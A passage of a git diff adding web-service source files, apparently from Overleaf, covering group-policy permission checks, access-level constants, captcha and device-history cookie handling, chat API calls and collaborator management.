* @throws {Error} If the policy is unknown. + */ +function getUserRestrictions(groupPolicy) { + const userCapabilities = getUserCapabilities(groupPolicy) + const userRestrictions = getDefaultCapabilities() + for (const capability of userCapabilities) { + userRestrictions.delete(capability) + } + return userRestrictions +} + +/** + * Checks if a user has permission for a given capability based on their group + * policy. + * + * @param {Object} groupPolicy - The group policy object for the user. 
+ * @param {string} capability - The name of the capability to check permission
+ * for.
+ * @returns {boolean} True if the user has permission for the capability, false
+ * otherwise.
+ * @throws {Error} If the capability does not exist.
+ */
+function hasPermission(groupPolicy, capability) {
+  ensureCapabilityExists(capability)
+  // look through all the entries in the group policy and see if any of them apply to the capability
+  const results = getEnforcedPolicyNames(groupPolicy).map(userPolicyName =>
+    getCapabilityValueFromPolicy(userPolicyName, capability)
+  )
+  // if there are no results, or none of the policies apply, return the default permission
+  if (results.length === 0 || results.every(result => result === undefined)) {
+    return getDefaultPermission(capability)
+  }
+  // only allow the permission if all the results are true, otherwise deny it
+  return results.every(result => result === true)
+}
+
+/**
+ * Asynchronously checks which policies a user complies with using the
+ * applicable validators. Each validator is an async function that takes an object
+ * with user, groupPolicy, and subscription properties and returns a boolean.
+ *
+ * @param {Object} options - The options object.
+ * @param {Object} options.user - The user object to check.
+ * @param {Object} options.groupPolicy - The group policy object to check.
+ * @param {Object} options.subscription - The subscription object for the group policy.
+ * @returns {Promise<Map>} A promise that resolves with a Map object containing
+ * the validation status for each enforced policy. The keys of the Map are the
+ * enforced policy names, and the values are booleans indicating whether the
+ * user complies with the policy.
+ */
+async function getUserValidationStatus({ user, groupPolicy, subscription }) {
+  // find all the enforced policies for the user
+  const enforcedPolicyNames = getEnforcedPolicyNames(groupPolicy)
+  // for each enforced policy, we have a list of capabilities with expected values
+  // some of those capabilities have validators
+  // we need to run the validators and check the results to see if the user complies with the policy
+  const userValidationStatus = new Map()
+  for (const enforcedPolicyName of enforcedPolicyNames) {
+    const validator = getValidatorFromPolicy(enforcedPolicyName)
+    if (validator) {
+      userValidationStatus.set(
+        enforcedPolicyName,
+        await validator({ user, subscription })
+      )
+    }
+  }
+  return userValidationStatus
+}
+
+/**
+ * Asserts that a user has permission for a given set of capabilities,
+ * as set out in both their current group subscription and any institutions
+ * they are affiliated with, throwing a ForbiddenError if they do not
+ *
+ * @param {Object} user - The user object to retrieve the group policy for.
+ * Only the user's _id is required
+ * @param {Array} requiredCapabilities - The list of capabilities to check permission for.
+ * @returns {Promise<void>}
+ * @throws {Error} If the user does not have permission
+ */
+async function assertUserPermissions(user, requiredCapabilities) {
+  const hasAllPermissions = await checkUserPermissions(
+    user,
+    requiredCapabilities
+  )
+  if (!hasAllPermissions) {
+    throw new ForbiddenError(
+      `user does not have one or more permissions within ${requiredCapabilities}`
+    )
+  }
+}
+
+/**
+ * Checks if a user has permission for a given set of capabilities,
+ * as set out in both their current group subscription and any institutions
+ * they are affiliated with
+ *
+ * @param {Object} user - The user object to retrieve the group policy for.
+ * Only the user's _id is required
+ * @param {Array} requiredCapabilities - The list of capabilities to check permission for.
+ * @returns {Promise<Boolean>} - true if the user has all permissions, false if not
+ */
+async function checkUserPermissions(user, requiredCapabilities) {
+  let results = await Modules.promises.hooks.fire('getGroupPolicyForUser', user)
+  results = results.flat()
+  if (!results?.length) return true
+
+  // get the combined group policy applying to the user
+  const groupPolicies = results.map(result => result.groupPolicy)
+  const combinedGroupPolicy = combineGroupPolicies(groupPolicies)
+  for (const requiredCapability of requiredCapabilities) {
+    // fail as soon as any required capability is missing
+    if (!hasPermission(combinedGroupPolicy, requiredCapability)) {
+      return false
+    }
+  }
+  return true
+}
+
+/**
+ * Checks if all collaborators of a given project have the specified capability, including the owner
+ *
+ * @async
+ * @function checkUserListPermissions
+ * @param {Object[]} userList - An array of all users to check permissions for
+ * @param {Array} capabilities - The list of capabilities to check permission for.
+ * @returns {Promise<boolean>} - A promise that resolves to `true` if all collaborators have the specified capability, otherwise `false`.
+ */
+async function checkUserListPermissions(userList, capabilities) {
+  for (const user of userList) {
+    // only the user's _id is needed to fetch their group policies
+    const allowed = await checkUserPermissions(user, capabilities)
+    if (!allowed) {
+      return false
+    }
+  }
+  return true
+}
+
+module.exports = {
+  validatePolicies,
+  registerCapability,
+  registerPolicy,
+  registerAllowedProperty,
+  combineGroupPolicies,
+  combineAllowedProperties,
+  getAllowedProperties,
+  hasPermission,
+  getUserCapabilities,
+  getUserRestrictions,
+  getUserValidationStatus: callbackify(getUserValidationStatus),
+  checkCollaboratorsPermission: callbackify(checkUserListPermissions),
+  checkUserPermissions: callbackify(checkUserPermissions),
+  promises: {
+    assertUserPermissions,
+    getUserValidationStatus,
+    checkUserListPermissions,
+    checkUserPermissions,
+  },
+}
diff --git a/services/web/app/src/Features/Authorization/PrivilegeLevels.js b/services/web/app/src/Features/Authorization/PrivilegeLevels.js
new file mode 100644
index 0000000..ff03cf8
--- /dev/null
+++ b/services/web/app/src/Features/Authorization/PrivilegeLevels.js
@@ -0,0 +1,9 @@
+const PrivilegeLevels = {
+  NONE: false,
+  READ_ONLY: 'readOnly',
+  READ_AND_WRITE: 'readAndWrite',
+  REVIEW: 'review',
+  OWNER: 'owner',
+}
+
+module.exports = PrivilegeLevels
diff --git a/services/web/app/src/Features/Authorization/PublicAccessLevels.js b/services/web/app/src/Features/Authorization/PublicAccessLevels.js
new file mode 100644
index 0000000..285acd1
--- /dev/null
+++ b/services/web/app/src/Features/Authorization/PublicAccessLevels.js
@@ -0,0 +1,17 @@
+/**
+ * Note:
+ * It used to be that `project.publicAccessLevel` could be set to `private`,
+ * `readOnly` or `readAndWrite`, the latter two of which made the project
+ * publicly accessible.
+ *
+ * This system was replaced with "link sharing", thereafter the valid values are
+ * `private` or `tokenBased`. While it is no longer possible to set
+ * `publicAccessLevel` to the legacy values, there are projects in the system
+ * that already have those values set.
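+ *
+ * Code reading this property must therefore still handle the legacy
+ * values; see AuthorizationManager, which maps them to read-only or
+ * read-and-write privilege levels.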
+ */ +module.exports = { + READ_ONLY: 'readOnly', // LEGACY + READ_AND_WRITE: 'readAndWrite', // LEGACY + PRIVATE: 'private', + TOKEN_BASED: 'tokenBased', +} diff --git a/services/web/app/src/Features/Authorization/Sources.js b/services/web/app/src/Features/Authorization/Sources.js new file mode 100644 index 0000000..e84126a --- /dev/null +++ b/services/web/app/src/Features/Authorization/Sources.js @@ -0,0 +1,5 @@ +module.exports = { + INVITE: 'invite', + TOKEN: 'token', + OWNER: 'owner', +} diff --git a/services/web/app/src/Features/BetaProgram/BetaProgramController.mjs b/services/web/app/src/Features/BetaProgram/BetaProgramController.mjs new file mode 100644 index 0000000..c7df6da --- /dev/null +++ b/services/web/app/src/Features/BetaProgram/BetaProgramController.mjs @@ -0,0 +1,57 @@ +import BetaProgramHandler from './BetaProgramHandler.mjs' +import OError from '@overleaf/o-error' +import UserGetter from '../User/UserGetter.js' +import logger from '@overleaf/logger' +import SessionManager from '../Authentication/SessionManager.js' +import SplitTestSessionHandler from '../SplitTests/SplitTestSessionHandler.js' +import { expressify } from '@overleaf/promise-utils' + +async function optIn(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + await BetaProgramHandler.promises.optIn(userId) + try { + await SplitTestSessionHandler.promises.sessionMaintenance(req, null) + } catch (error) { + logger.error( + { err: error }, + 'Failed to perform session maintenance after beta program opt in' + ) + } + res.redirect('/beta/participate') +} + +async function optOut(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + await BetaProgramHandler.promises.optOut(userId) + try { + await SplitTestSessionHandler.promises.sessionMaintenance(req, null) + } catch (error) { + logger.error( + { err: error }, + 'Failed to perform session maintenance after beta program opt out' + ) + } + res.redirect('/beta/participate') +} + +async function optInPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + let user + try { + user = await UserGetter.promises.getUser(userId, { betaProgram: 1 }) + } catch (error) { + throw OError.tag(error, 'error fetching user', { + userId, + }) + } + res.render('beta_program/opt_in', { + title: 'sharelatex_beta_program', + user, + }) +} + +export default { + optIn: expressify(optIn), + optOut: expressify(optOut), + optInPage: expressify(optInPage), +} diff --git a/services/web/app/src/Features/BetaProgram/BetaProgramHandler.mjs b/services/web/app/src/Features/BetaProgram/BetaProgramHandler.mjs new file mode 100644 index 0000000..74270ea --- /dev/null +++ b/services/web/app/src/Features/BetaProgram/BetaProgramHandler.mjs @@ -0,0 +1,35 @@ +import { callbackify } from 'node:util' +import metrics from '@overleaf/metrics' +import UserUpdater from '../User/UserUpdater.js' +import AnalyticsManager from '../Analytics/AnalyticsManager.js' + +async function optIn(userId) { + await UserUpdater.promises.updateUser(userId, { $set: { betaProgram: true } }) + metrics.inc('beta-program.opt-in') + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'beta-program', + true + ) +} + +async function optOut(userId) { + await UserUpdater.promises.updateUser(userId, { + $set: { betaProgram: false }, + }) + metrics.inc('beta-program.opt-out') + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'beta-program', + false + ) +} + +export default { + optIn: callbackify(optIn), + optOut: callbackify(optOut), + 
promises: { + optIn, + optOut, + }, +} diff --git a/services/web/app/src/Features/BrandVariations/BrandVariationsHandler.js b/services/web/app/src/Features/BrandVariations/BrandVariationsHandler.js new file mode 100644 index 0000000..942fa3a --- /dev/null +++ b/services/web/app/src/Features/BrandVariations/BrandVariationsHandler.js @@ -0,0 +1,86 @@ +const OError = require('@overleaf/o-error') +const { URL } = require('url') +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const V1Api = require('../V1/V1Api') +const sanitizeHtml = require('sanitize-html') +const { promisify } = require('@overleaf/promise-utils') + +module.exports = { + getBrandVariationById, + promises: { + getBrandVariationById: promisify(getBrandVariationById), + }, +} + +function getBrandVariationById(brandVariationId, callback) { + if (brandVariationId == null || brandVariationId === '') { + return callback(new Error('Branding variation id not provided')) + } + logger.debug({ brandVariationId }, 'fetching brand variation details from v1') + V1Api.request( + { + uri: `/api/v2/brand_variations/${brandVariationId}`, + }, + function (error, response, brandVariationDetails) { + if (error != null) { + OError.tag(error, 'error getting brand variation details', { + brandVariationId, + }) + return callback(error) + } + formatBrandVariationDetails(brandVariationDetails) + sanitizeBrandVariationDetails(brandVariationDetails) + callback(null, brandVariationDetails) + } + ) +} + +function formatBrandVariationDetails(details) { + if (details.export_url != null) { + details.export_url = setV1AsHostIfRelativeURL(details.export_url) + } + if (details.home_url != null) { + details.home_url = setV1AsHostIfRelativeURL(details.home_url) + } + if (details.logo_url != null) { + details.logo_url = setV1AsHostIfRelativeURL(details.logo_url) + } + if (details.journal_guidelines_url != null) { + details.journal_guidelines_url = setV1AsHostIfRelativeURL( + details.journal_guidelines_url + ) + } + if (details.journal_cover_url != null) { + details.journal_cover_url = setV1AsHostIfRelativeURL( + details.journal_cover_url + ) + } + if (details.submission_confirmation_page_logo_url != null) { + details.submission_confirmation_page_logo_url = setV1AsHostIfRelativeURL( + details.submission_confirmation_page_logo_url + ) + } + if (details.publish_menu_icon != null) { + details.publish_menu_icon = setV1AsHostIfRelativeURL( + details.publish_menu_icon + ) + } +} + +function sanitizeBrandVariationDetails(details) { + if (details.submit_button_html) { + details.submit_button_html = sanitizeHtml( + details.submit_button_html, + settings.modules.sanitize.options + ) + } +} + +function setV1AsHostIfRelativeURL(urlString) { + // The first argument is the base URL to resolve against if the second argument is not absolute. + // As it only applies if the second argument is not absolute, we can use it to transform relative URLs into + // absolute ones using v1 as the host. If the URL is absolute (e.g. 
a filepicker one), then the base + // argument is just ignored + return new URL(urlString, settings.apis.v1.publicUrl).href +} diff --git a/services/web/app/src/Features/Captcha/CaptchaMiddleware.js b/services/web/app/src/Features/Captcha/CaptchaMiddleware.js new file mode 100644 index 0000000..9c93b74 --- /dev/null +++ b/services/web/app/src/Features/Captcha/CaptchaMiddleware.js @@ -0,0 +1,119 @@ +const { fetchJson } = require('@overleaf/fetch-utils') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const OError = require('@overleaf/o-error') +const DeviceHistory = require('./DeviceHistory') +const AuthenticationController = require('../Authentication/AuthenticationController') +const { expressify } = require('@overleaf/promise-utils') +const EmailsHelper = require('../Helpers/EmailHelper') + +function respondInvalidCaptcha(req, res) { + res.status(400).json({ + errorReason: 'cannot_verify_user_not_robot', + message: { + text: req.i18n.translate('cannot_verify_user_not_robot'), + }, + }) +} + +async function initializeDeviceHistory(req) { + req.deviceHistory = new DeviceHistory() + try { + await req.deviceHistory.parse(req) + } catch (err) { + logger.err({ err }, 'cannot parse deviceHistory') + } +} + +async function canSkipCaptcha(req, res) { + const trustedUser = + req.body?.email && Settings.recaptcha.trustedUsers.includes(req.body.email) + if (trustedUser) { + return res.json(true) + } + await initializeDeviceHistory(req) + const canSkip = req.deviceHistory.has(req.body?.email) + Metrics.inc('captcha_pre_flight', 1, { + status: canSkip ? 'skipped' : 'missing', + }) + res.json(canSkip) +} + +function validateCaptcha(action) { + return expressify(async function (req, res, next) { + const email = EmailsHelper.parseEmail(req.body?.email) + const trustedUser = + email && + (Settings.recaptcha.trustedUsers.includes(email) || + Settings.recaptcha.trustedUsersRegex?.test(email)) + if (!Settings.recaptcha?.siteKey || Settings.recaptcha.disabled[action]) { + if (action === 'login') { + AuthenticationController.setAuditInfo(req, { captcha: 'disabled' }) + } + Metrics.inc('captcha', 1, { path: action, status: 'disabled' }) + return next() + } + if (trustedUser) { + if (action === 'login') { + AuthenticationController.setAuditInfo(req, { captcha: 'trusted' }) + } + Metrics.inc('captcha', 1, { path: action, status: 'trusted' }) + return next() + } + const reCaptchaResponse = req.body['g-recaptcha-response'] + if (action === 'login') { + await initializeDeviceHistory(req) + const fromKnownDevice = req.deviceHistory.has(email) + AuthenticationController.setAuditInfo(req, { fromKnownDevice }) + if (!reCaptchaResponse && fromKnownDevice) { + // The user has previously logged in from this device, which required + // solving a captcha or keeping the device history alive. + // We can skip checking the (missing) captcha response. 
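+        // (The device history is an encrypted cookie holding the emails and
+        // timestamps of recent logins from this browser; see DeviceHistory
+        // below for the parse/serialize details.)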
+        AuthenticationController.setAuditInfo(req, { captcha: 'skipped' })
+        Metrics.inc('captcha', 1, { path: action, status: 'skipped' })
+        return next()
+      }
+    }
+    if (!reCaptchaResponse) {
+      Metrics.inc('captcha', 1, { path: action, status: 'missing' })
+      return respondInvalidCaptcha(req, res)
+    }
+
+    let body
+    try {
+      body = await fetchJson(Settings.recaptcha.endpoint, {
+        method: 'POST',
+        body: new URLSearchParams([
+          ['secret', Settings.recaptcha.secretKey],
+          ['response', reCaptchaResponse],
+        ]),
+      })
+    } catch (err) {
+      Metrics.inc('captcha', 1, { path: action, status: 'error' })
+      throw OError.tag(err, 'failed recaptcha siteverify request', {
+        body: err.body,
+      })
+    }
+
+    if (!body.success) {
+      logger.warn(
+        { statusCode: 200, body },
+        'failed recaptcha siteverify request'
+      )
+      Metrics.inc('captcha', 1, { path: action, status: 'failed' })
+      return respondInvalidCaptcha(req, res)
+    }
+    Metrics.inc('captcha', 1, { path: action, status: 'solved' })
+    if (action === 'login') {
+      AuthenticationController.setAuditInfo(req, { captcha: 'solved' })
+    }
+    next()
+  })
+}
+
+module.exports = {
+  respondInvalidCaptcha,
+  validateCaptcha,
+  canSkipCaptcha: expressify(canSkipCaptcha),
+}
diff --git a/services/web/app/src/Features/Captcha/DeviceHistory.js b/services/web/app/src/Features/Captcha/DeviceHistory.js
new file mode 100644
index 0000000..06b90b2
--- /dev/null
+++ b/services/web/app/src/Features/Captcha/DeviceHistory.js
@@ -0,0 +1,103 @@
+const crypto = require('crypto')
+const jose = require('jose')
+const Metrics = require('@overleaf/metrics')
+const Settings = require('@overleaf/settings')
+
+const COOKIE_NAME = Settings.deviceHistory.cookieName
+const ENTRY_EXPIRY = Settings.deviceHistory.entryExpiry
+const MAX_ENTRIES = Settings.deviceHistory.maxEntries
+
+let SECRET
+if (Settings.deviceHistory.secret) {
+  SECRET = crypto.createSecretKey(
+    Buffer.from(Settings.deviceHistory.secret, 'hex')
+  )
+}
+const CONTENT_ENCRYPTION_ALGORITHM = 'A256GCM'
+const KEY_MANAGEMENT_ALGORITHM = 'A256GCMKW'
+const ENCRYPTION_HEADER = {
+  alg: KEY_MANAGEMENT_ALGORITHM,
+  enc: CONTENT_ENCRYPTION_ALGORITHM,
+}
+const DECRYPTION_OPTIONS = {
+  contentEncryptionAlgorithms: [CONTENT_ENCRYPTION_ALGORITHM],
+  keyManagementAlgorithms: [KEY_MANAGEMENT_ALGORITHM],
+}
+
+const ENCODER = new TextEncoder()
+const DECODER = new TextDecoder()
+
+class DeviceHistory {
+  constructor() {
+    this.entries = []
+  }
+
+  has(email) {
+    return this.entries.some(entry => entry.e === email)
+  }
+
+  add(email) {
+    // Entries are sorted by age, starting from oldest (idx 0) to newest.
+    // When parsing/serializing we look at the last n=MAX_ENTRIES entries
+    // from the list and discard any other stale entries.
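+    // Illustrative entry shape, with made-up values:
+    //   [{ e: 'older@example.com', t: 1700000000000 },
+    //    { e: 'newer@example.com', t: 1700000360000 }]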
+ this.entries = this.entries.filter(entry => entry.e !== email) + this.entries.push({ e: email, t: Date.now() }) + } + + async serialize(res) { + let v = '' + if (this.entries.length > 0 && SECRET) { + v = await new jose.CompactEncrypt( + ENCODER.encode(JSON.stringify(this.entries.slice(-MAX_ENTRIES))) + ) + .setProtectedHeader(ENCRYPTION_HEADER) + .encrypt(SECRET) + } + + const options = { + domain: Settings.cookieDomain, + maxAge: ENTRY_EXPIRY, + secure: Settings.secureCookie, + sameSite: Settings.sameSiteCookie, + httpOnly: true, + path: '/login', + } + if (v) { + res.cookie(COOKIE_NAME, v, options) + } else { + options.maxAge = -1 + res.clearCookie(COOKIE_NAME, options) + } + } + + async parse(req) { + const blob = req.cookies[COOKIE_NAME] + if (!blob || !SECRET) { + Metrics.inc('device_history', 1, { status: 'missing' }) + return + } + try { + const { plaintext } = await jose.compactDecrypt( + blob, + SECRET, + DECRYPTION_OPTIONS + ) + const minTimestamp = Date.now() - ENTRY_EXPIRY + this.entries = JSON.parse(DECODER.decode(plaintext)) + .slice(-MAX_ENTRIES) + .filter(entry => entry.t > minTimestamp) + } catch (err) { + Metrics.inc('device_history', 1, { status: 'failure' }) + throw err + } + if (this.entries.length === MAX_ENTRIES) { + // Track hitting the limit, we might need to increase the limit. + Metrics.inc('device_history_at_limit') + } + // Collect quantiles of the size + Metrics.summary('device_history_size', this.entries.length) + Metrics.inc('device_history', 1, { status: 'success' }) + } +} + +module.exports = DeviceHistory diff --git a/services/web/app/src/Features/Chat/ChatApiHandler.js b/services/web/app/src/Features/Chat/ChatApiHandler.js new file mode 100644 index 0000000..2929891 --- /dev/null +++ b/services/web/app/src/Features/Chat/ChatApiHandler.js @@ -0,0 +1,166 @@ +// @ts-check + +const { fetchJson, fetchNothing } = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const { callbackify } = require('util') + +async function getThreads(projectId) { + return await fetchJson(chatApiUrl(`/project/${projectId}/threads`)) +} + +async function destroyProject(projectId) { + await fetchNothing(chatApiUrl(`/project/${projectId}`), { method: 'DELETE' }) +} + +async function sendGlobalMessage(projectId, userId, content) { + const message = await fetchJson( + chatApiUrl(`/project/${projectId}/messages`), + { + method: 'POST', + json: { user_id: userId, content }, + } + ) + return message +} + +async function getGlobalMessages(projectId, limit, before) { + const url = chatApiUrl(`/project/${projectId}/messages`) + if (limit != null) { + url.searchParams.set('limit', limit) + } + if (before != null) { + url.searchParams.set('before', before) + } + + return await fetchJson(url) +} + +async function sendComment(projectId, threadId, userId, content) { + const comment = await fetchJson( + chatApiUrl(`/project/${projectId}/thread/${threadId}/messages`), + { + method: 'POST', + json: { user_id: userId, content }, + } + ) + return comment +} + +async function resolveThread(projectId, threadId, userId) { + await fetchNothing( + chatApiUrl(`/project/${projectId}/thread/${threadId}/resolve`), + { + method: 'POST', + json: { user_id: userId }, + } + ) +} + +async function reopenThread(projectId, threadId) { + await fetchNothing( + chatApiUrl(`/project/${projectId}/thread/${threadId}/reopen`), + { method: 'POST' } + ) +} + +async function deleteThread(projectId, threadId) { + await fetchNothing(chatApiUrl(`/project/${projectId}/thread/${threadId}`), { + 
method: 'DELETE', + }) +} + +async function editMessage(projectId, threadId, messageId, userId, content) { + await fetchNothing( + chatApiUrl( + `/project/${projectId}/thread/${threadId}/messages/${messageId}/edit` + ), + { + method: 'POST', + json: { content, userId }, + } + ) +} + +async function deleteMessage(projectId, threadId, messageId) { + await fetchNothing( + chatApiUrl( + `/project/${projectId}/thread/${threadId}/messages/${messageId}` + ), + { method: 'DELETE' } + ) +} + +async function deleteUserMessage(projectId, threadId, userId, messageId) { + await fetchNothing( + chatApiUrl( + `/project/${projectId}/thread/${threadId}/user/${userId}/messages/${messageId}` + ), + { method: 'DELETE' } + ) +} + +async function getResolvedThreadIds(projectId) { + const body = await fetchJson( + chatApiUrl(`/project/${projectId}/resolved-thread-ids`) + ) + return body.resolvedThreadIds +} + +async function duplicateCommentThreads(projectId, threads) { + return await fetchJson( + chatApiUrl(`/project/${projectId}/duplicate-comment-threads`), + { + method: 'POST', + json: { + threads, + }, + } + ) +} + +async function generateThreadData(projectId, threads) { + return await fetchJson( + chatApiUrl(`/project/${projectId}/generate-thread-data`), + { + method: 'POST', + json: { threads }, + } + ) +} + +function chatApiUrl(path) { + return new URL(path, settings.apis.chat.internal_url) +} + +module.exports = { + getThreads: callbackify(getThreads), + destroyProject: callbackify(destroyProject), + sendGlobalMessage: callbackify(sendGlobalMessage), + getGlobalMessages: callbackify(getGlobalMessages), + sendComment: callbackify(sendComment), + resolveThread: callbackify(resolveThread), + reopenThread: callbackify(reopenThread), + deleteThread: callbackify(deleteThread), + editMessage: callbackify(editMessage), + deleteMessage: callbackify(deleteMessage), + deleteUserMessage: callbackify(deleteUserMessage), + getResolvedThreadIds: callbackify(getResolvedThreadIds), + duplicateCommentThreads: callbackify(duplicateCommentThreads), + generateThreadData: callbackify(generateThreadData), + promises: { + getThreads, + destroyProject, + sendGlobalMessage, + getGlobalMessages, + sendComment, + resolveThread, + reopenThread, + deleteThread, + editMessage, + deleteMessage, + deleteUserMessage, + getResolvedThreadIds, + duplicateCommentThreads, + generateThreadData, + }, +} diff --git a/services/web/app/src/Features/Chat/ChatController.js b/services/web/app/src/Features/Chat/ChatController.js new file mode 100644 index 0000000..51d217e --- /dev/null +++ b/services/web/app/src/Features/Chat/ChatController.js @@ -0,0 +1,84 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
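+// Note: this controller is still callback-style throughout; promise-based
+// equivalents of the chat operations are available via ChatApiHandler.promises.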
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+let ChatController
+const ChatApiHandler = require('./ChatApiHandler')
+const EditorRealTimeController = require('../Editor/EditorRealTimeController')
+const SessionManager = require('../Authentication/SessionManager')
+const UserInfoManager = require('../User/UserInfoManager')
+const UserInfoController = require('../User/UserInfoController')
+const ChatManager = require('./ChatManager')
+const logger = require('@overleaf/logger')
+
+module.exports = ChatController = {
+  sendMessage(req, res, next) {
+    const { project_id: projectId } = req.params
+    const { content, client_id: clientId } = req.body
+    const userId = SessionManager.getLoggedInUserId(req.session)
+    if (userId == null) {
+      const err = new Error('no logged-in user')
+      return next(err)
+    }
+    return ChatApiHandler.sendGlobalMessage(
+      projectId,
+      userId,
+      content,
+      function (err, message) {
+        if (err != null) {
+          return next(err)
+        }
+        return UserInfoManager.getPersonalInfo(
+          message.user_id,
+          function (err, user) {
+            if (err != null) {
+              return next(err)
+            }
+            message.user = UserInfoController.formatPersonalInfo(user)
+            message.clientId = clientId
+            EditorRealTimeController.emitToRoom(
+              projectId,
+              'new-chat-message',
+              message
+            )
+            return res.sendStatus(204)
+          }
+        )
+      }
+    )
+  },
+
+  getMessages(req, res, next) {
+    const { project_id: projectId } = req.params
+    const { query } = req
+    return ChatApiHandler.getGlobalMessages(
+      projectId,
+      query.limit,
+      query.before,
+      function (err, messages) {
+        if (err != null) {
+          return next(err)
+        }
+        return ChatManager.injectUserInfoIntoThreads(
+          { global: { messages } },
+          function (err) {
+            if (err != null) {
+              return next(err)
+            }
+            return res.json(messages)
+          }
+        )
+      }
+    )
+  },
+}
diff --git a/services/web/app/src/Features/Chat/ChatManager.js b/services/web/app/src/Features/Chat/ChatManager.js
new file mode 100644
index 0000000..9625881
--- /dev/null
+++ b/services/web/app/src/Features/Chat/ChatManager.js
@@ -0,0 +1,61 @@
+const async = require('async')
+const UserInfoManager = require('../User/UserInfoManager')
+const UserInfoController = require('../User/UserInfoController')
+const { promisify } = require('@overleaf/promise-utils')
+
+function injectUserInfoIntoThreads(threads, callback) {
+  // There will be a lot of repetition of user_ids, so first build a list
+  // of unique ones to perform db lookups on, then use these to populate the
+  // user fields
+  let message, thread, threadId, userId
+  if (callback == null) {
+    callback = function () {}
+  }
+  const userIds = {}
+  for (threadId in threads) {
+    thread = threads[threadId]
+    if (thread.resolved) {
+      userIds[thread.resolved_by_user_id] = true
+    }
+    for (message of Array.from(thread.messages)) {
+      userIds[message.user_id] = true
+    }
+  }
+
+  const jobs = []
+  const users = {}
+  for (userId in userIds) {
+    ;(userId =>
+      jobs.push(cb =>
+        UserInfoManager.getPersonalInfo(userId, function (error, user) {
+          if (error != null) return cb(error)
+          user = UserInfoController.formatPersonalInfo(user)
+          users[userId] = user
+          cb()
+        })
+      ))(userId)
+  }
+
+  return async.series(jobs, function (error) {
+    if (error != null) {
+      return callback(error)
+    }
+    for (threadId in threads) {
+      thread = threads[threadId]
+      if (thread.resolved)
{ + thread.resolved_by_user = users[thread.resolved_by_user_id] + } + for (message of Array.from(thread.messages)) { + message.user = users[message.user_id] + } + } + return callback(null, threads) + }) +} + +module.exports = { + injectUserInfoIntoThreads, + promises: { + injectUserInfoIntoThreads: promisify(injectUserInfoIntoThreads), + }, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsController.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsController.mjs new file mode 100644 index 0000000..d2cecbc --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsController.mjs @@ -0,0 +1,202 @@ +import OError from '@overleaf/o-error' +import HttpErrorHandler from '../../Features/Errors/HttpErrorHandler.js' +import mongodb from 'mongodb-legacy' +import CollaboratorsHandler from './CollaboratorsHandler.js' +import CollaboratorsGetter from './CollaboratorsGetter.js' +import OwnershipTransferHandler from './OwnershipTransferHandler.js' +import SessionManager from '../Authentication/SessionManager.js' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import TagsHandler from '../Tags/TagsHandler.js' +import Errors from '../Errors/Errors.js' +import logger from '@overleaf/logger' +import { expressify } from '@overleaf/promise-utils' +import { hasAdminAccess } from '../Helpers/AdminAuthorizationHelper.js' +import TokenAccessHandler from '../TokenAccess/TokenAccessHandler.js' +import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' + +const ObjectId = mongodb.ObjectId + +export default { + removeUserFromProject: expressify(removeUserFromProject), + removeSelfFromProject: expressify(removeSelfFromProject), + getAllMembers: expressify(getAllMembers), + setCollaboratorInfo: expressify(setCollaboratorInfo), + transferOwnership: expressify(transferOwnership), + getShareTokens: expressify(getShareTokens), +} + +async function removeUserFromProject(req, res, next) { + const projectId = req.params.Project_id + const userId = req.params.user_id + const sessionUserId = SessionManager.getLoggedInUserId(req.session) + await _removeUserIdFromProject(projectId, userId) + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + members: true, + }) + + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'remove-collaborator', + sessionUserId, + req.ip, + { userId } + ) + + res.sendStatus(204) +} + +async function removeSelfFromProject(req, res, next) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + await _removeUserIdFromProject(projectId, userId) + + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'leave-project', + userId, + req.ip + ) + + res.sendStatus(204) +} + +async function getAllMembers(req, res, next) { + const projectId = req.params.Project_id + logger.debug({ projectId }, 'getting all active members for project') + let members + try { + members = await CollaboratorsGetter.promises.getAllInvitedMembers(projectId) + } catch (err) { + throw OError.tag(err, 'error getting members for project', { projectId }) + } + res.json({ members }) +} + +async function setCollaboratorInfo(req, res, next) { + try { + const projectId = req.params.Project_id + const userId = req.params.user_id + const { privilegeLevel } = req.body + + const allowed = + await LimitationsManager.promises.canChangeCollaboratorPrivilegeLevel( + projectId, + userId, + 
